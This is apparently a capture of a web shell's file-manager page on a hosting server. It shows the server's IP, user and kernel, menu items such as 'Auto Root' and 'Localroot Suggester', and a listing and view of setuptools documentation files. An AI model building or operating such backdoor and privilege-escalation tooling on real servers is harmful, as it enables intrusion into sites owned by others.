Linux evo.fastest-server.com 5.14.0-284.1101.el9.tuxcare.11.els11.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Aug 14 13:30:35 UTC 2026 x86_64
LiteSpeed
Server IP : 103.249.112.113 & Your IP : 216.73.217.135
Domains : 988 Domain
User : tanishks
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
doc /
python3-setuptools /
userguide /
Delete
Unzip
Name
Size
Permission
Date
Action
commands.rst
26.73
KB
-rw-r--r--
2021-02-01 15:39
datafiles.rst
7.69
KB
-rw-r--r--
2021-02-01 15:39
declarative_config.rst
8.48
KB
-rw-r--r--
2025-09-21 11:46
dependency_management.rst
9.72
KB
-rw-r--r--
2021-02-01 15:39
development_mode.rst
3.2
KB
-rw-r--r--
2021-02-01 15:39
distribution.rst
12.14
KB
-rw-r--r--
2021-02-01 15:39
entry_point.rst
5.12
KB
-rw-r--r--
2021-02-01 15:39
extension.rst
10.52
KB
-rw-r--r--
2021-02-01 15:39
functionalities_rewrite.rst
342
B
-rw-r--r--
2021-02-01 15:39
index.rst
1.12
KB
-rw-r--r--
2021-02-01 15:39
keywords.rst
9.18
KB
-rw-r--r--
2021-02-01 15:39
miscellaneous.rst
5.54
KB
-rw-r--r--
2021-02-01 15:39
package_discovery.rst
6.57
KB
-rw-r--r--
2021-02-01 15:39
quickstart.rst
7.56
KB
-rw-r--r--
2021-02-01 15:39
Save
Rename
================================================== Building and Distributing Packages with Setuptools ================================================== ``Setuptools`` is a collection of enhancements to the Python ``distutils`` that allow developers to more easily build and distribute Python packages, especially ones that have dependencies on other packages. Packages built and distributed using ``setuptools`` look to the user like ordinary Python packages based on the ``distutils``. Transition to PEP517 ==================== Since setuptools no longer serves as the default build tool, one must explicitly opt in (by providing a :file:`pyproject.toml` file) to use this library. The user facing part is provided by tools such as pip and backend interface is described :doc:`in this document <../build_meta>`. The quickstart provides an overview of the new workflow. .. toctree:: :maxdepth: 1 quickstart package_discovery entry_point dependency_management datafiles development_mode distribution extension declarative_config keywords commands functionalities_rewrite miscellaneous